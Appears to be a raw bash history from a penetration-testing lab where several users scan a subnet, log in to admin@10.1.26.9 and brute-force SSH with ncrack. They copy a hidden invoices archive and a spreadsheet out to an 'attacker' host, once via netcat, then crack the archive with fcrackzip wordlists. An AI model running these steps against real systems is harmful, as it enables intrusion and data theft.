fcrackzip -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip --help
ssh admin@10.1.26.9
passwd admin
passwd admin
passwd admin
passwd admin
asd
passwd admin
passwd admin
passwd admin
eexiit
exit
ipconfig
ifconfig
nmap 10.0.2.15
nmap 10.1.26.23
nmap 127.0.0.1
ssh 10.1.26.23
ssh 10.1.26.23
nmap
ifconfig
ifconfig /all
ifconfig all
nmap 10.0.2.15 -p
nmap -p 10.0.2.15
nmap 10.0.2.15
nmap -h 10.0.2.15
nmap -f 10.0.2.15
nmap 127.0.0.1
ifconfig -a
infconfig eth0
ifconfig eth0
ifconfig lo
nmap -s -V
ifconfig
nmap -sV 10.1.26.9
ssh 10.1.26.9
ssh 10.1.26.9
ssh 10.1.26.9
ssh 10.1.26.9
ssh 10.1.26.9
ssh admin 10.1.26.9
ssh admin@10.1.26.9
ls
sudo-apt-get update
sudo apt-get update
sudo apt-get install fcrackzip
ssh admin@10.1.26.9
ls
scp admin@server:invoices2019.zip /local/directory/
ls
scp admin@server:invoices2019.zip root@attacker:downloads
scp admin@server:invoices2019.zip /local/directory/
scp admin@server:invoices2019.zip downloads
cd Downloads
ls
cd..
cd ..
ls
ls
scp admin@ipadres:invoices2019.zip /downloads
scp admin@10.1.26.9:invoices2019.zip /downloads
scp admin@10.1.26.9:invoices2019.zip /Downloads
scp admin@10.1.26.9:invoices2019.zip/Downloads
scp admin@10.1.26.9:invoices2019.zip /Downloads
scp -i admin@10.1.26.9:invoices2019.zip /Downloads
scp -i admin@10.1.26.9:invoices2019.zip /local/directory/
scp admin@10.1.26.9:invoices2019.zip /local/directory/
scp admin@10.1.26.9:invoices2019.zip /Downloads
scp admin@10.1.26.9:invoices2019.zip /Downloads
ls
cd Downloads
ls
ls
cd ..
ls
scp admin@10.1.26.9:invoices2019.zip /Downloads
ls
cd Downloads
ls
cd ..
scp admin@10.1.26.9:invoices2019.zip /Documents
cd Documents
ls
cd ..
scp admin@10.1.26.9:invoices2019.zip /Documents
scp admin@10.1.26.9:invoices2019.zip /Documents
ls
cd Documents
ls
scp admin@10.1.26.9:invoices2019.zip /Documents
ls
cd ..
scp admin@10.1.26.9:invoices2019.zip /Documents
scp admin@10.1.26.9:invoices2019.zip /root/Downloads
cd Downloads
ls
cd ..
cd Downloads
ls
sudo cp /usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz
fcrackzip --help
cd ..
sudo cp /usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz
sudo cp /wordlists/rockyou.txt.gz rockyou.txt.gz
ls
cd Public
ls
cd Templates
cd ..
cd Templates
ls
cd ..
cd Downloads
sudo -b invoices2019.zip
sudo cp -b invoices2019.zip
sudo cp --help
clear
cd..
cd ..
clear
cd Downloads
frackzip -u -D -p /usr/share/wordlist/rockyou.txt invoices2019.zip
cd ..
frackzip -u -D -p /usr/share/wordlist/rockyou.txt invoices2019.zip
sudo apt-get update
sudo apt-get install fcrackzip
fcrackzip -help
fcrackzip -D
fcrackzip --help
sudo cp/usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz
sudo cp /usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz
sudo cp /downloads/wordlists/rockyou.txt.gz rockyou.txt.gz
fcrackzip -v -u -D -p /home/root/rockyou.txt /home/root/Downloads/invoices2019.zip
ls
cd documents
cd Documents
ls
cd ..
cd Public
ls
cd ..
fcrackzip -v -u -D -p /usr/share/fasttrack.txt /home/root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /usr/share/fasttrack.txt /home/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /usr/share/fasttrack.txt /root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /home/usr/share/fasttrack.txt /root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /usr/share/set/src/fasttrack.txt /root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /usr/share/set/src/fasttrack/wordlist.txt /root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /usr/share/wordlist/fasttrack.txt /root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /root/desktop/fasttrack.txt /root/Downloads/invoices2019.zip
fcrackzip -v -u -D -p /root/Desktop/fasttrack.txt /root/Downloads/invoices2019.zip
sudo passwd invoices2019.txt
sudo passwd invoices2019
cd Downloads
sudo passwd invoices2019
sudo passwd invoices2019.txt
ls
sudo passwd invoices2019.zip
sudo passwd admin invoices2019.zip
sudo passwd admin
sudo passwd admin invoices2019.zip
sudo passwd root
locate game_disign.md
locate game_design.md
d
ifocnfig
ifconfig
nmap 10.0.2.1/24
ssh admin@10.0.2.4
ssh admin@10.0.2.15
password
ssh admin@10.0.2.15
nmap 10.1.26.1/24
ssh admin@10.1.26.9
ls
ls -la
fcrackzip
fcrackzip --help
fcrackzip
base64 invoices2019.zip
sudo apt install filezilla
filezilla
cd Dse
cd Eesk
cd Desktop/
ls
locate rockyou.txt
cd /usr/share/wordlists/
ls
ls -la
fcrackzip -v -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
passwd admin
passwd root
test
nmap
nmap -v 10.1.26.9
ssh admin@10.1.26.9
ls
ifconfig
scp invoices2019.zip root@10.1.26.23:/
scp invoices2019.zip
exit
scp admin@10.1.26.9:/invoices2019.zip /
ssh admin@10.1.26.9
ls
path
scp invoices2019.zip root@10.1.26.23:/home
ls
scp invoices2019.zip root@10.1.26.23:/home/downloads/
xit
exit
scp admin@10.1.26.9:/home/admin/invoices2019.zip
scp admin@10.1.26.9:/home/admin/invoices2019.zip /home/root/
scp admin@10.1.26.9:/home/admin/invoices2019.zip /home/root/invoices2019.zip
scp admin@10.1.26.9:/home/admin/invoices2019.zip /home/root
ls
cd..
cd /home/
ls
cd root
cd ..
ls
cd ~
ls
scp admin@10.1.26.9:/home/admin/invoices2019.zip ~/zip/invoices2019.zip
scp admin@10.1.26.9:/home/admin/invoices2019.zip .
ls
fcrackzip
fcrackzip --help
fcrackzip -b invoices2019.zip
fcrackzip invoices2019.zip -b -D
ssh admin 10.1.26.9
ssh admin@10.1.26.9
ls
exit
scp admin@10.1.26.9:/home/admin/Romeo-and-Juliet.pdf .
scp admin@10.1.26.9:/home/admin/Treasure-Island.pdf .
fcrackzip invoices2019.zip -b -D Treasure-Island.pdf
fcrackzip invoices2019.zip -b -c Treasure-Island.pdf
fcrackzip -D -p Treasure-Island.pdf invoices2019.zip
fcrackzip -D -p Romeo-and-Juliet.pdf invoices2019.zip
fcrackzip -u -D -v -p Romeo-and-Juliet.pdf invoices2019.zip
fcrackzip -u -D -v -p Treasure-Island.pdf invoices2019.zip
fcrackzip -u -b -v -c aA invoices2019.zip
fcrackzip -c aA -p aaaaaaaaaa invoices2019.zip
ls
ssh admin@10.1.26.9
ls
cat Mydata.xlsx
ls
cd/
cd ~
ls
cd /home
ls
cd admin/
ls
cd Croatia\\ 2019/
ls
cd ..
cd Italy\\ 2018/
ls
ls
cd /
ls
cd usr/
ls
cd share/
ls
cat wordlists/
cd wordlists/
ls
cat fasttrack.txt
cd ~
ls
fcrackzip -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt invoices2019.zip
cd /usr/share/wordlists/
ls
exit
ssh admin@10.1.26.9
password
password admin
psswd
passwd
passwd
passwd
passwd admin
echo Adam
cd /root/
ls
cd hacking/
ls
ssh 10.1.26.0/24
nmap 10.1.26.0/24
ssh 10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
cd ..
cd ..
ls
cd admin/
ls
ls -a
cd personal/
ls -a
scp .invoices2019.zip root@10.1.26.23
cd /home/
ls
ls -a
cd root/
ls
-a
ls -a
ssh admin@10.1.26.9
ls -a
cd pe
cd personal/
ls -a
scp .invoices2019.zip root@10.1.26.23:
scp .invoices2019.zip root@10.1.26.23:
scp .invoices2019.zip root@attacker:
scp .invoices2019.zip root@10.1.26.23:
rcp .invoices2019.zip root@10.1.26.23:
scp admin@10.1.26.9:home/admin/personal/.invoices2019.zip .
ssh admin@10.1.26.9
cd personal/
ls
ls -a
dir
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
ls
ls -a
man fcrackzip
fcrackzip --use-unzip .invoices2019.zip
man fcrackzip
fcrackzip --brute-force
fcrackzip --brute-force .invoices2019.zip
fcrackzip --brute-force --use-unzip .invoices2019.zip
fcrackzip --brute-force .invoices2019.zip
fcrackzip -b -u .invoices2019.zip
ls
ls -a
cd ..
ls
cd root/
ls
ls -a
cd /home
ls
cd root/
ls
~/hacking/
cd ~/hacking/
ls
fcrackzip -D wordlist.txt -u /home/root/.invoices2019.zip
fcrackzip -D 'wordlist.txt' -u /home/root/.invoices2019.zip
fcrackzip -D -p 'wordlist.txt' -u /home/root/.invoices2019.zip
cd ~/hacking/
fcrackzip -D -p 'wordlist.txt' -u /home/root/.invoices2019.zip
echo "Bob"
ls
cd hacking/
ls
cat wordlist.txt
cd /root
ls
cd hacking/
ls
cat wordlist.txt
nmap --help
nmap -v -sn 10.1.26.0/24
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd /home
ls
cd admin/
ls
ls -la
cd personal/
ls
ls -la
fcrackzip
scp -h
scp .invoices2019.zip root@10.1.26.23:
exit
scp admin@server:/personal/.invoices2019.zip ./
scp admin@10.1.26.9:/personal/.invoices2019.zip ./
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ./
ls
cd ..
ls
cd ..
ls
cd home/
cd /hacking
ls
cd root/
ls
cd ~/hacking
ls
ls -la
man fcrackzip
fcrackzip --brute-force .invoices2019.zip
unzip -P 'aakK!w' .invoices2019.zip
man fcrackzip
fcrackzip --brute-force -u .invoices2019.zip
fcrackzip -b -c 'a' .invoices2019.zip
fcrackzip -b -u -c 'a' .invoices2019.zip
fcrackzip -b -u -c 'a' .invoices2019.zip
fcrackzip -b -c 'a' .invoices2019.zip
fcrackzip -b -u .invoices2019.zip
ssh admin@10.1.26.9
ls
cd personal/
ls
ls -la
cd Croatia\ 2019/
ls
cd ..
cat Mydata.xlsx
ls
cat Romeo-and-Juliet.pdf
ls
cat Treasure-Island.pdf
exit
ls
cd hacking/
ls
fcrackzip -D -p wordlist.txt .invoices2019.zip
fcrackzip -D -p wordlist.txt -u .invoices2019.zip
exit
exit
echo Jake
ls
pwd
cd /root/
ls
cd hacking/
ls
vim wordlist.txt
nmap 10.1.26.0-254
ssh 10.1.26.9
ssh admin@10.1.26.9
ls -a
cd personal/
ls -a
scp .invoices2019.zip root@attacker:/hacking
exit
ip -a
ip a
ssh admin@10.1.26.9
cd personal/
scp .invoices2019.zip attacker@10.1.26.23:/hacking
scp .invoices2019.zip root@10.1.26.23:/hacking
scp .invoices2019.zip root@attacker:/hacking
exit
hostname -I
ssh admin@10.1.26.9
scp .invoices2019.zip attacker@192.168.131.211:/hacking
scp .invoices2019.zip root@192.168.131.211:/hacking
scp .invoices2019.zip attacker@192.168.131.211:/hacking
cd personal/
pwd
exit
ssh admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/hacking
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/hacking
ls -a
man fcrackzip
man fcrackzip
fcrackzip -D -p wordlist.txt .invoices2019.zip
echo Alice
ls /root
ls -L /root
find dirname -not empty -ls
find dirname -not -empty -ls
find -not -empty -ls
arp -a
nmap 10.1.26.0
nmap -Pn 10.1.26.0
nmap 192.168.128.1
nmap 192.168.130.0
ipconfig
npm -p- 192.168.130.0
nmap -p- 192.168.130.0
nc -z -v 192.168.130.0
ifconfig
nmap -p- 192.168.128.137
nmap -p- 10.1.26.23
ping 10.1.26.0
ping 10.1.26.0 -b
ifconfig -all
ifconfig --help
nmap 10.1.26.0/24
ssh admin@10.1.269
ssh admin@10.1.26.9
ssh admin@10.1.26.9
find home -iname \*.zip
ls
find ~/home -iname \*.zip
find ~/admin/home -iname \*.zip
cd ..
find home -iname \*.zip
find -iname \*.zip
scp ./admin/personal/.invoices2019.zip attacker@10.1.26.23
scp ./admin/personal/.invoices2019.zip attacker@10.1.26.23/home/invoices2019.zip
scp ./admin/personal/.invoices2019.zip attacker@10.1.26.23:/home/invoices2019.zip
scp ./admin/personal/.invoices2019.zip root@10.1.26.23:/home/invoices2019.zip
scp admin@10.1.26.9:./admin/personal/.invoices2019.zip ./
scp admin@10.1.26.9:./home/admin/personal/.invoices2019.zip ./
ls
find -iname \*.zip
scp admin@10.1.26.9:/admin/personal/.invoices2019.zip ./
cd admin/personal/
ls
ls -a
scp admin@10.1.26.9:.invoices2019.zip ./
scp admin@server:.invoices2019.zip ./
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ./
exit
ls
ls -a
ssh admin@10.1.26.9
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/Documents
exit
ls Documents/
ls -a Documents/
ssh admin@10.1.26.9
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/Desktop/invoices2019.zip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/Desktop/.invoices2019.zip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/Documents
exit
ls -la
ls -la Documents/
man fcrackzip
find . -name .invoices2019.zip
find . -name *.zip
cd home
cd /home/
ls Documents/
ls
cd root/
ls
cd ..
ls
ls -l
ssh admin@10.1.26.9
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/Desktop
exit
ls
cd root
ls
ls -la
man fcrackzip
fcrack -D - /usr/share/wordlists/fasttrack.txt invoices2019.zip
fcrackzip -D -u /usr/share/wordlists/fasttrack.txt invoices2019.zip
man fcrackzip
ls -la
ls -la
fcrackzip -D -u /usr/share/wordlists/fasttrack.txt /somewhereovertherainbow
fcrackzip -D -u -p /usr/share/wordlists/fasttrack.txt /Documents/invoices2019.zip
ssh admin@10.1.26.9
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root/
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /home/root/Documents
ls -la /root/Destop
exit
ls -la /root/Desktop/
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip .
ls -la
echo Peter
LS
ls
cd hacking/
ls
ip a
nmap 192.168.129.96
nmap 10.1.26.23
nmap -sn 10.1.26.23
nmap -sn 10.1.26.0/24
nmap 10.1.26.1
nmap 10.1.26.2
nmap 10.1.26.4
nmap 10.1.26.9
nmap 10.1.26.9
nmap 10.1.26.254
nmap -sn 10.1.26.0/24
nmap 10.1.26.9
ssh 10.1.26.9
ssh admin@10.1.26.9
ssh admin@10.1.26.9; expect "password";
ssh --help
ssh admin@10.1.26.9 -P password
find . -inam *.zip
find . -iname *.zip
find . -iname *.ZIP
ls
ssh admin@10.1.26.9
find . -iname *.ZIP
ssh admin@10.1.26.9
pwd
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip .
ls
cd ..
ls
ls -l
ls -a
cd hacking/
ls -a
fcrackzip -D -u .invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D ./.invoices2019.zip
fcrackzip -D -v -u ./.invoices2019.zip
man fcrackzip
fcrackzip .invoices2019.zip
fcrackzip -b -ca1 -v  .invoices2019.zip
fcrackzip -b -ca1 -v -u  .invoices2019.zip
fcrackzip -b -caA1 -l 6-10 -v -u  .invoices2019.zip
ls
vim wordlist.txt
fcrackzip -D wordlist.txt -v -u  .invoices2019.zip
fcrackzip -D -v -u ./wordlist.txt  .invoices2019.zip
fcrackzip -v -D -u -p ./wordlist.txt secret.zip
fcrackzip -v -D -u -p ./wordlist.txt .invoices2019.zip
echo "Jacob"
ls
pwd
ls -la
cd hacking
ls
nmap -sP 10.1.26.1-254
nmap -sP 10.1.26.1-254 -A
nmap -sV 10.1.26.1-254 -A
nmap -sV 10.1.26.1-254
nmap -sV 10.1.26.1-254 -A
nmap -sV 10.1.26.9 -A
nmap -sV -Pn  10.1.26.9
nmap -sV -Pn  10.1.26.1-254
nmap -sV -Pn  10.1.26.0-255
nmap -sV -p-  10.1.26.0-255
ssh admin@10.1.26.9
ssh admin@10.1.26.9
pwd
find . -iname \*.zip
scp root@attacker /root ./personal/.invoices2019.zip
ls
ls -la
scp root@attacker /root ./personal/.invoices2019.zip
scp root@attacker /root ./personal
sftp admin@10.1.26.9
ls
ls Downloads/
ls
ls /
ls /hom
ls /home
sftp admin@10.1.26.9:personal/.invoices2019.zip result
ls
cd result
ls
fcrackzip -b result
fcrackzip -b -u result
man fcrackzip
sftp admin@10.1.26.9:personal/.invoices2019.zip result
pwd
sftp admin@10.1.26.9:personal/.invoices2019.zip /root
ls
ls -la
fcrackzip -b -u .invoices2019.zip
ls
ls hacking
fcrackzip -v -u -D -p hacking/wordlist.txt  .invoices2019.zip
echo Milan
cd
ls
cd hacking/
ls
cat wordlist.txt
su root
ls -al
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
ls personal/
find . -name *.zip
scp admin@10.1.26.9:~/./personal/.invoices2019.zip ~/
man fcrackzip
cd ..
man fcrackzip
fcrackzip -D hacking/wordlist.txt .invoices2019.zip
man fcrackzip
cat hacking/wordlist.txt
man fcrackzip
sort hacking/wordlist.txt
sort hacking/wordlist.txt > wordlist.txt
fcrackzip -D wordlist.txt .invoices2019.zip
man fcrackzip
fcrackzip -D .invoices2019.zip
man fcrackzip
fcrackzip -D .invoices2019.zip
man fcrackzip
fcrackzip -D .invoices2019.zip --use-unzip
ls
ls -al
fcrackzip -D .invoices2019.zip
man fcrackzip
fcrackzip .invoices2019.zip
fcrackzip -p wordlist.txt -D .invoices2019.zip
man fcrackzip
fcrackzip -p wordlist.txt -D .invoices2019.zip -u
ls
unzip .invoices2019.zip
ls -l
echo Jack
ls
cd hacking/
ls
nmap 10.1.26.0-24
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Italy\ 2018/
ls
cd ..
cd Croatia\ 2019/
ls
cd ~
ls
cd personal
ls
cd /
ls
cd home
ls
cd debian/
ls
cd ../admin/
ls
cd personal
ls
ls -al
scp .invoices2019.zip root@attacker:.
scp .invoices2019.zip root@10.1.26.3
scp .invoices2019.zip root@10.1.26.23
ls
cd ..
ls
ls -a
cd hacking/
ls -a
ssh admin@10.1.26.9
ls
cd personal/
ls
scp .invoices2019.zip root@10.1.26.23:~/hacking
scp .invoices2019.zip root@attacker:~/hacking
scp .invoices2019.zip 10.1.26.23:~
scp .invoices2019.zip root@10.1.26.23:~
nc -l -p 9999 > invoices.zip
nc -l -p 9999 > invoices.zip &
ls
ssh admin@10.1.26.9
ls -al
cd personal
ls
ls -al
nc 10.1.26.23 9999 < .invoices2019.zip
scp .invoices2019.zip root@10.1.26.23:~/hacking
scp .invoices2019.zip admin@10.1.26.23:~/hacking
cd ../.ssh
ls
cd ../hacking
ls
cd ..
ls
cd personal/
ls
rm root@10.1.26.23
rm root@10.1.26.3
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
ls
man fcrackzip
fcrackzip -D wordlist.txt .invoices2019.zip
man fcrackzip
less wordlist.txt
man fcrackzip
fcrackzip -D .invoices2019.zip
fcrackzip -D -p wordlist.txt .invoices2019.zip
ls
ll
ls
cd hacking/
nmap 10.1.26.0/24
history
ssh admin@10.1.26.9
nfslogin -h
history
ssh admin@10.1.26.9
exit
ls
ls
cd personal/
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
ls
cd ..
cd ..
ll
ls
cd ..
ls
cd lost+found/
cd media/
ls
cd ..
cd home/
ls
cd admin/
ls
cd personal/
ls
cd ..
ls
cd ..
ls
cd debian/
ls
cd ..
cd admin/
ls
cd personal/
ll
ks
ls
exit
history
cat wordlist.txt
man fcrackzip
fcrackzi -D -p ./wordlist.txt .invoices2019.zip
fcrackzip -D -p ./wordlist.txt .invoices2019.zip
history
exiz
exit
pwd
ll
ls -la
ll
ls hacking/
ssh root@10.1.26.1
ifconfig
ssh root@10.1.26.3
ssh root@10.1.26.1
ssh root@10.1.26.1
ssh root@10.1.26.1
ssh root@10.1.26.1
ssh root@10.1.26.1
ping 10.1.26.1
ping 10.1.26.2
ping 10.1.26.3
ssh root@10.1.26.2
ssh root@10.1.26.1
less hacking/wordlist.txt
less hacking/wordlist.txt
netstat
nmap 10.1.26.0/24
fcrackzip -D -p hacking/wordlist.txt .invoices2019.zip
less hacking/wordlist.txt
history
history
ls -la
pwd
history
ls personal/
ls -la
cd personal/
ls ls /root/
ls
ls -l /root/
ls -la /root/
ls /root/
ls /root/
ls -la /root/hacking/
cat ~/.bashrc
nmap --help
ssh admin@10.1.26.9
nmap 10.1.26.0/24
nmapnnnnnnnn
pwd
ls -la
ls =la
cd Documents/
ls -la
cd ..
ls -la Desktop/
ls -la Downloads/
ls -la Music/
ls -la Pictures/
ls -la Public/
ls -la Templates/
ls -la Videos/
ls -la .local
ls -la .ssh
ls -la .gnupg/
ls -la .config/
ls -la .cache
ls -la hacking
history
svvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv#026#026#026#026
namap
nmap 10.1.26.0/24
history
ssh admin@10.1.26.9
ls -la
ls -la personal/
pwd
scp admin@10.1.26.9/home/admin/.invoices2019.zip /.
cat TAX1579659.txt
cat TAX15796249.txt
cat TAX15796252.txt
cat TAX15796259.txt
fcrackzip -b -V -u .invoices2019.zip
fcrackzip -b -V --method .invoices2019.zip
fcrackzip -b -u .invoices2019.zip
cd ..
fcrackzip -V -b .invoices2019.zip
fcrackzip -b -V -u .invoices2019.zip
fcrackzip -b -u .invoices2019.zip
ls -la
fcrackzip -b -v unzip .invoices2019.zip
fcrack -b -v unzip .invoices2019.zip
ls
fcrackzip -D hacking/wordlist.txt .invoices2019.zip
fcrackzip -D -p  hacking/wordlist.txt .invoices2019.zip
unzip .invoices2019.zip
cd invoices2019/
cat TAX15796249.txt
ls
cd hacking
ls
ifconfig
ls
nmap 10.1.26.0/24
history
ssh admin@10.1.26.9
x
x
x
ls
cd personal
ls
cd Croatia\ 2019/
ls
exit
history
ls
cd personal/
ls
ls -la
history
cd Croatia\ 2019/
ls
cd ../Italy\ 2018/
ls
cd ..
cat Mydata.xlsx
ls
clear
history
ls -la
ls
cd ..
ls
cd home/
ls
cd root/
ls
cd..
cd debian/
cd  ..
ls
ls
ls -l
cd hacking/
ls
history
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
find . -iname /*.zip
find . -iname \*.zip
scp --helllllp
scp --p
scp --help
cd
scp admin@10.1.26.9:./personal/invoices2019.zip ./
scp admin@10.1.26.9:/home/admin/personal/invoices2019.zip ./
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ./
ls
man fcrackzip
fcrackzip -D hacking/wordlist.txt ./.invoices2019.zip
fcrackzip -D -p hacking/wordlist.txt ./.invoices2019.zip
ls -a
tree
ls -al
cd hacking/
ls
nmap -h
nmap -v -sn 192.168.0.0/16
nmap -v -sn 10.1.26.0/24
nmap -v -sn 10.1.26.0/24 -p
nmap -h
nmap -sn 10.1.26.0/24 -p
nmap -sn 10.1.26.0/24
nmap -sn 10.1.26.0/24
nmap -h
nmap -sn 10.1.26.0/24 -O
nmap -sn 10.1.26.0/24 --top-ports 20
nmap  10.1.26.1
nmap  10.1.26.2
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh -h
ssh admin@10.1.26.9
ls
cd personal
ls
tree
find *.zip
find -h
find --help
find .  *.zip
ls
ls
ls -a
scp admin@10.1.26.9~/personal .invoices2019.zip .
scp admin@10.1.26.9/personal .invoices2019.zip .
scp admin@10.1.26.9/personal/.invoices2019.zip .
scp admin@10.1.26.9~/personal/.invoices2019.zip .
scp -h
man scp
scp admin@10.1.26.9:personal/.invoices2019.zip .
ls
ls -a
man fcrackzip
fcrackzip -b .invoices2019.zip
ls
man fcrackzip
fcrackzip -b .invoices2019.zip -u
ls
man fcrackzip
fcrackzip -D .invoices2019.zip -u
fcrackzip -D .invoices2019.zip -u
fcrackzip -D -i .invoices2019.zip
fcrackzip -D -u .invoices2019.zip
man fcrackzip
fcrackzip -b -u .invoices2019.zip
tmux
ls
man fcrackzip
ls
cd /usr/share/wordlists/
ls
cd ~
fcrackzip -u .invoices2019.zip  -D /usr/share/wordlists/fasttrack.txt
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt .invoices.zip
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt .invoices2019.zip
ls -l
cd hacking/
fcrackzip -u -D -p /usr/share/wordlists/fasttrack.txt .invoices2019.zip
vim /usr/share/wordlists/fasttrack.txt
ls /root/hacking/wordlist.txt
nmap 10.1.26.0
nmap 10.1.26.
nmap 10.1.26.1
arp
nmap 10.1.26.1
nmap 10.1.26.1-10
nmap 10.1.26.1-254
nmap 10.1.26.0-254
ncrack -h
ncrack --user admin --pass password,admin,123456
ncrack --user admin --pass password,admin,123456 ssh://10.1.26.9
ssh admin@10.1.26.9
ls
ls -lR
scp -h
scp @:/
cd personal/ && scp @:/
ls
cd ..
ls -a
ls -lRa
zip
scp 10.1.26.9 localhost
scp @:/ personal/.invoices2019.zip
scp personal/.invoices2019.zip @:/
scp personal/.invoices2019.zip  10.1.26.9 localhost
scp personal/.invoices2019.zip  admin@10.1.26.9 localhost
scp admin@10.1.26.9:~/personal/.invoices2019.zip @:/
scp admin@10.1.26.9:~/personal/.invoices2019.zip @
ls
ls @
ls @ -lR
scp admin@10.1.26.9:~/personal/.invoices2019.zip invoices.zip
ls
rm @
ls -l
ls
ls hacking/
cat hacking/wordlist.txt
ls
man fcrackzip
fcrackzip -h
fcrackzip -D hacking/wordlist.txt invoices.zip
fcrackzip -D  invoices.zip
fcrackzip -D invoices.zip
fcrackzip -v -D invoices.zip
sort hacking/wordlist.txt | fcrackzip -v -D invoices.zip
fcrackzip -v invoices.zip
fcrackzip --dictionary -v invoices.zip
fcrackzip --dictionary -v hacking/wordlist.txt
fcrackzip --dictionary -v hacking/wordlist.txt invoices.zip
fcrackzip --dictionary hacking/wordlist.txt invoices.zip
fcrackzip --dictionary -p hacking/wordlist.txt invoices.zip
ls
cd hacking/
ls
cd ..
nmap -sP 10.1.26.0/24.
nmap -sP 10.1.26.0/24
cat /etc/services
nmap -help
nmap 10.1.26.0/24
nmap 10.1.26.254
nmap 10.1.26.254
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd ..
cr Italy\ 2018/
cd Italy\ 2018/
ls
cd ..
scp Mydata.xlsx root@attacker
cd ..
exit
ls
cd hacking/
ls
cd ..
ssh admin@10.1.26.9
cd ..
exit
scp -r admin@10.1.26.9:~/Mydata.xlsx ~/hacking/
scp -r admin@10.1.26.9:Mydata.xlsx ~/hacking/
scp -r admin@10.1.26.9:~/Mydata.xlsx ~/hacking/
ssh admin@10.1.26.9
ls
cd personal/
ls
cd ..
exit
scp -r admin@10.1.26.9:~/personal/Mydata.xlsx ~/hacking/
ls
cd hacking/
ls
cd ..
cd hacking/
zip adminInfo Mydata.xlsx
ls
ls
mv adminInfo.zip ~
cd ..
ls
zip -help
ls
cd hacking/
ls
mv Mydata.xlsx ~
cd ..
ls
zip -help
ssh admin@10.1.26.9
ls -a
cd personal/
ls -a
exit
scp -r admin@10.1.26.9:~/personal/.invoices2019.zip ~
man fcrackzip
cd hacking/
cat wordlist.txt
mv wordlist.txt ~
cd ..
man fcrackzip
ls
ls -a
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D wordlist.txt .invoices2019.zip
man fcrackzip
fcrackzip -dictionary wordlist.txt .invoices2019.zip
fcrackzip --dictionary wordlist.txt .invoices2019.zip
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D wordlist.txt '.invoices2019.zip'
fcrackzip '.invoices2019.zip'
fcrackzip '.invoices2019.zip' -d wordlist.txt
crackzip '.invoices2019.zip' -D wordlist.t
fcrackzip '.invoices2019.zip' -D wordlist.t
fcrackzip '.invoices2019.zip' -D wordlist.txt
ls
man fcrackzip
fcrackzip '.invoices2019.zip' -D wordlist.txt -u -p
fcrackzip -u -D -p '~/..invoices2019.zipinvoices2019.zip'
fcrackzip -u -D -p '~/wordlist.txt' .invoices2019.zip
ls
fcrackzip -u -D -p 'wordlist.txt' .invoices2019.zip
ls
cd hacking/
ls
cat wordlist.txt
man nmap
nmap
nmap 10.1.26.0/24
man ssh
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
find zip
ls -R
cd ..
ls
ls -R
ls
cd admin
ls
cd personal
ls
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
cd ..
ls
cd ..
ls -a
ls -a -R
scp admin@10.1.26.9:.invoices2019.zip /
scp admin@10.1.26.9:/home/personal/.invoices2019.zip /
scp admin@10.1.26.9:/personal/.invoices2019.zip /
ssh admin@10.1.26.9
ls
scp admin@10.1.26.9:personal/.invoices2019.zip /
ls
ls -a
cd ..
ls
cd ..
ls -a
man fcrackzip
frackzip .invoices2019.zip
man fcrackzip
man fcrackzip
fcrackzip .invoices2019.zip
fcrackzip .invoices2019.zip -u
man fcrackzip
fcrackzip -u -D /home/hacking/wordlist.txt .invoices2019.zip
ls
cd home
ls
cd root
ls
ls
cd ..
ls
cd debian/
ls
cd ..
cd root
ls -a
cd ..
cd ~
ls
cd ..
ls
cd root
ls
cd ..
fcrackzip -u -D /root/hacking/wordlist.txt .invoices2019.zip
man fcrack
man fcrackzip
fcrackzip -u -D .invoices2019.zip
fcrackzip -u .invoices2019.zip
